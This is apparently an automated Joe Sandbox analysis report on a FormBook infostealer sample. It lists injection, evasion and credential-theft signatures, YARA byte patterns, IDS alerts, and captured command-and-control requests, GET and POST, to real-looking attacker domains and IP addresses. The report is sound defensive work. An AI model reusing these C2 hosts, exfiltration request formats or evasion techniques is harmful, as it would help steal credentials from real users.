
Windows Analysis Report
3T-ENQ-O-2024-10856.exe

Overview

General Information

Sample name: 3T-ENQ-O-2024-10856.exe
Analysis ID: 1509340
MD5: b2218f5d997fcad8ffd678a82ca0a9b2
SHA1: dc6ecd5bc824bfc835338af196dbdd04859f5ff8
SHA256: 09ac6376b07a7b513e3250e66dda03697803dc861dab52ed3a297046b6f1e065
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 3T-ENQ-O-2024-10856.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe" MD5: B2218F5D997FCAD8FFD678A82CA0A9B2)
    • svchost.exe (PID: 7368 cmdline: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • CgEnKbPFVbMNeA.exe (PID: 5452 cmdline: "C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 7620 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • CgEnKbPFVbMNeA.exe (PID: 4884 cmdline: "C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7868 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x2e3e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x2f1e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe", CommandLine: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe", ParentImage: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe, ParentProcessId: 7308, ParentProcessName: 3T-ENQ-O-2024-10856.exe, ProcessCommandLine: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe", ProcessId: 7368, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe", CommandLine: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe", ParentImage: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe, ParentProcessId: 7308, ParentProcessName: 3T-ENQ-O-2024-10856.exe, ProcessCommandLine: "C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe", ProcessId: 7368, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-11T14:25:23.685445+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49710 | 3.33.130.190 | 80 | TCP
2024-09-11T14:25:47.733495+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49714 | 18.139.62.226 | 80 | TCP
2024-09-11T14:26:01.474977+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49718 | 66.81.203.10 | 80 | TCP
2024-09-11T14:26:15.364789+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.11 | 49722 | 103.42.108.46 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-11T14:25:40.404921+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49711 | 18.139.62.226 | 80 | TCP
2024-09-11T14:25:42.624519+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49712 | 18.139.62.226 | 80 | TCP
2024-09-11T14:25:45.179370+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49713 | 18.139.62.226 | 80 | TCP
2024-09-11T14:25:53.594449+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49715 | 66.81.203.10 | 80 | TCP
2024-09-11T14:25:56.139554+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49716 | 66.81.203.10 | 80 | TCP
2024-09-11T14:25:58.725921+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49717 | 66.81.203.10 | 80 | TCP
2024-09-11T14:26:07.700537+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49719 | 103.42.108.46 | 80 | TCP
2024-09-11T14:26:10.257388+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49720 | 103.42.108.46 | 80 | TCP
2024-09-11T14:26:12.825439+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49721 | 103.42.108.46 | 80 | TCP
2024-09-11T14:26:20.868957+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49723 | 3.33.130.190 | 80 | TCP
2024-09-11T14:26:23.445179+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49724 | 3.33.130.190 | 80 | TCP
2024-09-11T14:26:26.521061+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.11 | 49725 | 3.33.130.190 | 80 | TCP


AV Detection

Source: 3T-ENQ-O-2024-10856.exe; ReversingLabs: Detection: 34%
Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2599340690.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2597752897.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1812298134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2599631540.00000000031B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1813082364.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: 3T-ENQ-O-2024-10856.exe; Joe Sandbox ML: detected
Source: 3T-ENQ-O-2024-10856.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CgEnKbPFVbMNeA.exe, 00000004.00000002.2598819494.0000000000BAE000.00000002.00000001.01000000.00000005.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000002.2598388539.0000000000BAE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1365624481.0000000004020000.00000004.00001000.00020000.00000000.sdmp, 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1363613646.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1717999457.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1812719227.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1812719227.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715868537.0000000003700000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1814673668.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1812307796.000000000351B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2599747762.0000000003870000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2599747762.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1365624481.0000000004020000.00000004.00001000.00020000.00000000.sdmp, 3T-ENQ-O-2024-10856.exe, 00000000.00000003.1363613646.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1717999457.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1812719227.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1812719227.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1715868537.0000000003700000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000003.1814673668.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1812307796.000000000351B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2599747762.0000000003870000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2599747762.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1812499101.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1779767157.0000000003414000.00000004.00000020.00020000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000004.00000003.1750564204.00000000009FB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1812499101.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1779767157.0000000003414000.00000004.00000020.00020000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000004.00000003.1750564204.00000000009FB000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe; Code function: 0_2_00C7DD92 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C7DD92
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe; Code function: 0_2_00CB2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CB2044
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe; Code function: 0_2_00CB219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CB219F
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe; Code function: 0_2_00CB24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CB24A9
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe; Code function: 0_2_00CA6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00CA6B3F
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe; Code function: 0_2_00CA6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00CA6E4A
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe; Code function: 0_2_00CAF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CAF350
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe; Code function: 0_2_00CAFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CAFDD2
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe; Code function: 0_2_00CAFD47 FindFirstFileW,FindClose,0_2_00CAFD47
Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 5_2_0301C0D0 FindFirstFileW,FindNextFileW,FindClose,5_2_0301C0D0
Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4x nop then xor eax, eax 5_2_03009B60
Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4x nop then pop edi 5_2_03022168
Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4x nop then pop edi 5_2_03022185
Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4x nop then mov ebx, 00000004h 5_2_036104DF

Networking

Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49710 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49711 -> 18.139.62.226:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49712 -> 18.139.62.226:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49717 -> 66.81.203.10:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49715 -> 66.81.203.10:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49720 -> 103.42.108.46:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49716 -> 66.81.203.10:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49721 -> 103.42.108.46:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49713 -> 18.139.62.226:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49718 -> 66.81.203.10:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49722 -> 103.42.108.46:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49719 -> 103.42.108.46:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49723 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49714 -> 18.139.62.226:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49724 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49725 -> 3.33.130.190:80
Source: Joe Sandbox View; IP Address: 18.139.62.226
Source: Joe Sandbox View; IP Address: 103.42.108.46
Source: Joe Sandbox View; IP Address: 3.33.130.190
Source: Joe Sandbox View; ASN Name: AMAZON-02US
Source: Joe Sandbox View; ASN Name: CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View; ASN Name: SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU
Source: Joe Sandbox View; ASN Name: AMAZONEXPANSIONGB
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (6 occurrences)
Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe; Code function: 0_2_00CB550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00CB550C
Source: global traffic; HTTP traffic detected:
    GET /gqyt/?yXf=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyyR5H80Th6YuXnGllCxy50CTDtPW+4zyR3Ik=&ndk=ctppWTth- HTTP/1.1
    Host: www.chamadaslotgiris.net
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected:
    GET /p5rq/?ndk=ctppWTth-&yXf=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5XgIEfDpHSeJZt7k9yl5pOWpoKoGLmM15kwU= HTTP/1.1
    Host: www.masteriocp.online
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected:
    GET /osde/?yXf=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sZHqZF0jtyzh4SZws5yKjtHhCwOPV3WXnk7o=&ndk=ctppWTth- HTTP/1.1
    Host: www.mediaplug.biz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected:
    GET /yl6y/?yXf=QPKrZbNCTa4h9OiWdSr2LPtYKpnFP+xQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+TDdCZJ74ZBA3ZkRiMUCXQcAhgpMcC+j5S2A=&ndk=ctppWTth- HTTP/1.1
    Host: www.independent200.org
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global traffic; DNS traffic detected: DNS query: www.linkbasic.net
Source: global traffic; DNS traffic detected: DNS query: www.chamadaslotgiris.net
Source: global traffic; DNS traffic detected: DNS query: www.masteriocp.online
Source: global traffic; DNS traffic detected: DNS query: www.mediaplug.biz
Source: global traffic; DNS traffic detected: DNS query: www.independent200.org
Source: global traffic; DNS traffic detected: DNS query: www.tigre777gg.online
Source: unknown; HTTP traffic detected:
    POST /p5rq/ HTTP/1.1
    Host: www.masteriocp.online
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US
    Connection: close
    Content-Length: 200
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Origin: http://www.masteriocp.online
    Referer: http://www.masteriocp.online/p5rq/
    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
    Data Raw: 79 58 66 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 56 41 32 6d 6d 78 6d 61 55 48 49 78 68 4c 70 74 77 55 35 72 38 72 79 6f 48 6b 79 76 70 7a 4a 33 76 2f 41 74 77 37 43 61 6b 78 4a 79 76 41 52 65 68 4c 4a 7a 7a 48 61 4d 4d 50 61 55 54 66 5a 6e 78 59 4b 2f 65 65 41 32 58 6d 30 61 5a 79 46 2f 45 50 64 2b 76 38 4e 6b 6d 48 63 52 4f 41 42 32 48 4a 6d 54 68 64 42 70 74 46 53 6b 79 31 46 56 37 4a 2f 54 73 5a 72 77 54 6f 67 65 66 70 64 38 61 35 32 6e 2b 37 47 43 52 38 73 4e 7a 4d 30 56 4b 6d 6e 37 76 68 59 70 68 74 35 2b 5a 34 2b 33 76 79 50 2b 32 69 6f 68 72 51 4a 62 67 47 5a 61 69 36 2b 53 6f 67 3d 3d
    Data Ascii: yXf=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7vhYpht5+Z4+3vyP+2iohrQJbgGZai6+Sog==
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Content-Type: text/plain; charset=utf-8
    Date: Wed, 11 Sep 2024 12:26:07 GMT
    Content-Length: 11
    Connection: close
    Data Raw: 42 61 64 20 52 65 71 75 65 73 74
    Data Ascii: Bad Request
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Content-Type: text/plain; charset=utf-8
    Date: Wed, 11 Sep 2024 12:26:10 GMT
    Content-Length: 11
    Connection: close
    Data Raw: 42 61 64 20 52 65 71 75 65 73 74
    Data Ascii: Bad Request
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Content-Type: text/plain; charset=utf-8
    Date: Wed, 11 Sep 2024 12:26:12 GMT
    Content-Length: 11
    Connection: close
    Data Raw: 42 61 64 20 52 65 71 75 65 73 74
    Data Ascii: Bad Request
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Content-Type: text/plain; charset=utf-8
    Date: Wed, 11 Sep 2024 12:26:15 GMT
    Content-Length: 11
    Connection: close
    Data Raw: 42 61 64 20 52 65 71 75 65 73 74
    Data Ascii: Bad Request
            Source: CgEnKbPFVbMNeA.exe, 00000008.00000002.2601820210.000000000546B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tigre777gg.online
            Source: CgEnKbPFVbMNeA.exe, 00000008.00000002.2601820210.000000000546B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tigre777gg.online/06rp/
            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
